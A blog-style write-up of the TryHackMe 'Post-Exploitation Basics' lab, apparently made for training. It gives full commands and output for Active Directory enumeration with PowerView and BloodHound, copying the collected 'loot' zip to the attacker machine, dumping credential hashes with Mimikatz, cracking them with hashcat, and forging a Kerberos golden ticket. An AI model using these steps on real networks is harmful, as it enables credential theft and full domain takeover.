10 minute read

Machine Information

postexploit

Post-Exploitation Basics is a beginner level room, that gives you the chance to try out several popular tools such as PowerView, Bloodhound and Mimikatz.

Details  
Hosting Site TryHackMe
Link To Machine THM - Medium - Post-Exploitation Basics
Machine Release Date 26th May 2020
Date I Completed It 10th June 2020
Distribution used Kali 2020.1 – Release Info

Task 1 - Introduction

This is just an introduction to the room. No answers are needed.

Task 2 - Powerview

First we need to connect to the server using the details provided:

root@kali:~# ssh Administrator@10.10.41.151
The authenticity of host '10.10.41.151 (10.10.41.151)' can't be established.
ECDSA key fingerprint is SHA256:jGGFsdyc6+usho+SGSQoG+3agPMuI+Y0SYylUJfLP8s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.41.151' (ECDSA) to the list of known hosts.
Administrator@10.10.41.151's password:
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>

Now we are connected we need to run powershell:

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator>

Now we can run PowerView:

PS C:\Users\Administrator> . .\Downloads\PowerView.ps1

We now have access to the commands that PowerView has loaded. First look at users:

PS C:\Users\Administrator> Get-NetUser | Select CN

cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST
sshd

Now look at the groups with admin in the name:

PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins

Question 2.1

Next we can look at the shares we can see:

PS C:\Users\Administrator> Get-NetShare
shi1_netname  shi1_type shi1_remark
------------  --------- -----------
ADMIN$       2147483648 Remote Admin
C$           2147483648 Default share
IPC$         2147483651 Remote IPC
NETLOGON              0 Logon server share
Share                 0
SYSVOL                0 Logon server share

We could also use the ShareFinder command:

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

Question 2.2

And now we can have a look at the computers:

PS C:\Users\Administrator> Get-NetComputer
Domain-Controller.CONTROLLER.local
Desktop-2.CONTROLLER.local
Desktop-1.CONTROLLER.local

PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem
operatingsystem
---------------
Windows Server 2019 Standard Evaluation
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Question 2.3

Finally we can take a look at all the users:

PS C:\Users\Administrator> Get-NetUser
logoncount             : 26
badpasswordtime        : 5/14/2020 12:25:47 PM
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=CONTROLLER,DC=local
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 6/9/2020 5:48:13 AM
name                   : Administrator
objectsid              : S-1-5-21-849420856-2351964222-986696166-500
samaccountname         : Administrator
admincount             : 1
codepage               : 0
samaccounttype         : 805306368
whenchanged            : 6/9/2020 12:48:13 PM
accountexpires         : 9223372036854775807
countrycode            : 0
adspath                : LDAP://CN=Administrator,CN=Users,DC=CONTROLLER,DC=local
instancetype           : 4
objectguid             : 1823a15b-34a7-49b2-a9f2-99279409f557
lastlogon              : 6/9/2020 5:48:24 AM
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=CONTROLLER,DC=local
dscorepropagationdata  : {5/14/2020 3:29:56 AM, 5/14/2020 3:29:56 AM, 5/14/2020 3:14:47 AM, 1/1/1601
                         6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local, CN=Domain
                         Admins,OU=Groups,DC=CONTROLLER,DC=local, CN=Enterprise
                         Admins,OU=Groups,DC=CONTROLLER,DC=local, CN=Schema
                         Admins,OU=Groups,DC=CONTROLLER,DC=local...}
whencreated            : 5/14/2020 3:13:54 AM
iscriticalsystemobject : True
badpwdcount            : 0
cn                     : Administrator
useraccountcontrol     : 66048
usncreated             : 8196
primarygroupid         : 513
pwdlastset             : 5/13/2020 8:00:12 PM
usnchanged             : 32790

pwdlastset             : 12/31/1600 4:00:00 PM
<<SNIP>>

We can also look at a specific user:

PS C:\Users\Administrator> Get-NetUser Post
logoncount            : 0
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=POST{<<HIDDEN>>},CN=Users,DC=CONTROLLER,DC=local
objectclass           : {top, person, organizationalPerson, user}
displayname           : POST{<<HIDDEN>>}
userprincipalname     : POST@CONTROLLER.local
name                  : POST{<<HIDDEN>>}
objectsid             : S-1-5-21-849420856-2351964222-986696166-1108
samaccountname        : POST
codepage              : 0
samaccounttype        : 805306368
whenchanged           : 5/14/2020 3:42:38 AM
accountexpires        : 9223372036854775807
countrycode           : 0
adspath               : LDAP://CN=POST{<<HIDDEN>>},CN=Users,DC=CONTROLLER,DC=local
instancetype          : 4
usncreated            : 12884
objectguid            : 090f9517-49d7-43f1-a051-9aaa5ed2088f
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=CONTROLLER,DC=local
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname             : POST{<<HIDDEN>>}
lastlogon             : 12/31/1600 4:00:00 PM
badpwdcount           : 0
cn                    : POST{<<HIDDEN>>}
useraccountcontrol    : 66048
whencreated           : 5/14/2020 3:42:36 AM
primarygroupid        : 513
pwdlastset            : 5/13/2020 8:42:38 PM
usnchanged            : 12889

Task 3 - Bloodhound

Next we get to look at Bloodhound, first we need to install Neo4j if you haven’t already got it:

root@kali:~# apt-get install neo4j
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  neo4j
0 upgraded, 1 newly installed, 0 to remove and 112 not upgraded.
Need to get 98.1 MB of archives.
After this operation, 114 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 neo4j all 3.5.3-0kali1 [98.1 MB]
Fetched 98.1 MB in 25s (3,928 kB/s)
Selecting previously unselected package neo4j.
(Reading database ... 317556 files and directories currently installed.)
Preparing to unpack .../neo4j_3.5.3-0kali1_all.deb ...
Unpacking neo4j (3.5.3-0kali1) ...
Setting up neo4j (3.5.3-0kali1) ...
Processing triggers for kali-menu (2020.2.2) ...
Scanning processes...
Scanning linux images...

We can check which version was installed:

root@kali:~# neo4j --version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
neo4j 3.5.3

Next we install BloodHound:

root@kali:~# apt-get install bloodhound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  bloodhound
0 upgraded, 1 newly installed, 0 to remove and 112 not upgraded.
Need to get 55.5 MB of archives.
After this operation, 237 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bloodhound amd64 3.0.4-0kali1 [55.5 MB]
Fetched 55.5 MB in 17s (3,215 kB/s)
Selecting previously unselected package bloodhound.
(Reading database ... 317690 files and directories currently installed.)
Preparing to unpack .../bloodhound_3.0.4-0kali1_amd64.deb ...
Unpacking bloodhound (3.0.4-0kali1) ...
Setting up bloodhound (3.0.4-0kali1) ...
Processing triggers for kali-menu (2020.2.2) ...
Scanning processes...
Scanning linux images...

Let’s start neo4j so we can connect to it:

root@kali:~# neo4j console
Active database: graph.db
Directories in use:
  home:         /usr/share/neo4j
  config:       /usr/share/neo4j/conf
  logs:         /usr/share/neo4j/logs
  plugins:      /usr/share/neo4j/plugins
  import:       /usr/share/neo4j/import
  data:         /usr/share/neo4j/data
  certificates: /usr/share/neo4j/certificates
  run:          /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
2020-06-09 13:38:11.468+0000 INFO  ======== Neo4j 3.5.3 ========
2020-06-09 13:38:11.486+0000 INFO  Starting...
2020-06-09 13:38:14.076+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2020-06-09 13:38:15.591+0000 INFO  Started.
2020-06-09 13:38:16.899+0000 INFO  Remote interface available at http://localhost:7474/

Open a browser and go to localhost on port 7474:

neo4j_login

The first time we run it we have to change the password:

neo4j_newpassword

Now we are at the dashboard, and Neo4j is up and running:

neo4j_main

Switch to a new terminal and start Bloodhound:

root@kali:~# bloodhound

A new browser window will open, log in with the username and password you set up for Neo4j:

bloodhound_login

Bloodhound is ready. Switch back to the target server:

root@kali:~# ssh Administrator@10.10.167.211
Administrator@10.10.167.211's password:
Microsoft Windows [Version 10.0.17763.737]
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Now we can run SharpHound to collect the AD information:

PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
----------------------------------------------
Initializing SharpHound at 1:52 PM on 6/9/2020
----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 78 MB RAM
Status: 66 objects finished (+66 66)/s -- Using 85 MB RAM
Enumeration finished in 00:00:01.5262541
Compressing data to C:\Users\Administrator\20200609135203_loot.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:52 PM on 6/9/2020! Happy Graphing!

We can use scp to copy loot from target back to Kali. First set SSH to allow root to access it, by editing /etc/ssh/sshd_config. Change the PermitRootLogin to remove # and put yes at the end:

# Authentication:
#LoginGraceTime 2m

PermitRootLogin yes

#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

Now start ssh temporarily:

root@kali:~/thm/postexploit# systemctl start ssh.socket

Back on the machine we can now copy the file across:

PS C:\Users\Administrator> scp .\20200609093439_loot.zip root@10.9.17.195:/root/loot.zip
The authenticity of host '10.9.17.195 (10.9.17.195)' can't be established.
ECDSA key fingerprint is SHA256:j2rFIhm/IhhKmKwx5YTtx70Ox8mpS+Qd8dskUOiXPD4.
Are you sure you want to continue connecting (yes/no)?
Warning: Permanently added '10.9.17.195' (ECDSA) to the list of known hosts.
root@10.9.17.195's password:
20200609093439_loot.zip                                                                                                                                                                                  100% 9537   298.1KB/s   00:00

Drop loot.zip on to the Bloodhound web page to import:

bloodhound_import

Question 3.1

Choose Queries then Find All Domain Admins:

bloodhound_find_da

Hover over graph to see the name of the service:

bloodhound_service

Question 3.2

Now we need to find the kerberoastable users, using this query:

bloodhound_kerberoastable

Looking at the graph we can see them:

bloodhound_kerberoastable_users

Task 4 - Mimikatz

To use some of the features of mimikatz such a cmd prompt elevation, we need to rdp to the target:

root@kali:~/thm/postexploit# rdesktop -u SG 10.10.87.158

The RDP window will open, log in with the provided credentials:

rdp_target

Question 4.1

Open a PowerShell window, then start mimikatz:

PS C:\Users\Administrator> cd .\Downloads\
PS C:\Users\Administrator\Downloads> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

First we need to enter debug mode (this only works if you have admin rights):

mimikatz # privilege::debug
Privilege '20' OK

Now we dump the hashes:

mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :
RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
<<SNIP>>

Now we have the hashes we can try to crack them. First let’s do it using hashcat and rockyou.txt:

root@kali:~# locate rockyou.txt
/usr/share/wordlists/rockyou.txt

root@kali:~# cat hashes.txt
2777b7fec870e04dda00cd7260f7bee6
5508500012cc005cf7082a9a89ebdfdf
64f12cddaa88057e06a81b54e73b949b
2b576acbe6bcfda7294d6bd18041b8fe
c39f2beb3d2ec06a62cb887fb391dee0
f4ab68f27303bcb4024650d8fc5f973a
c4b0e1b10c7ce2c4723b4e2407ef81a2
bb068638512ac1118ce7f78e92f49792
634fc097987e56849234eb459373d1e7
3c2d4759eb9884d7a935fe71a8e0f54c
7d33346eeb11a4f12a6c201faaa0d89a

root@kali:~# hashcat -m 1000 --force hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 512/1493 MB allocatable, 2MCU
Hashes: 11 digests; 11 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

* Device #1: Kernel m01000_a0-pure.47f99bfe.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

64f12cddaa88057e06a81b54e73b949b:<<HIDDEN>>
c39f2beb3d2ec06a62cb887fb391dee0:<<HIDDEN>>
c4b0e1b10c7ce2c4723b4e2407ef81a2:<<HIDDEN>>
2777b7fec870e04dda00cd7260f7bee6:<<HIDDEN>>
f4ab68f27303bcb4024650d8fc5f973a:<<HIDDEN>>  
Approaching final keyspace - workload adjusted.  

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: NTLM
Hash.Target......: hashes.txt
Time.Started.....: Tue Jun  9 20:59:08 2020 (7 secs)
Time.Estimated...: Tue Jun  9 20:59:15 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1914.5 kH/s (0.32ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/11 (45.45%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Tue Jun  9 20:58:53 2020
Stopped: Tue Jun  9 20:59:16 2020

Question 4.2

We could also use an online service like hashes.com:

crack_hashes

Task 5 - Mimikatz

Now we can try creating a Golden Ticket, first we need to gather information for the krgtgt user:

mimikatz # lsadump::lsa /inject /name:krbtgt

Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 <<SNIP>>

  * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4

With the information dumped above we can create our ticket:

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 6/9/2020 1:06:25 PM ; 6/7/2030 1:06:25 PM ; 6/7/2030 1:06:25 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

With the ticket created we can now start a new command prompt:

mimikatz_misc_cmd

If there were other devices on the network, such as servers or desktops, we would be able to browse to them, authenticate etc.

Task 6 - Server Manager

Question 6.1

The last thing we can do while we are RDP’d to the target is have a look at Server Manager:

rdesktop_adusers

Question 6.2

In this example we see an account has it’s password added as a description:

rdesktop_sqlservice

Task 7 - Maintaining Access

This module describes how to use msfvenom to create payload. Then use Meterpreter to transfer that to the target, and use it to maintain access.

There are no questions to answer for this task.

All done. See you next time.

Comments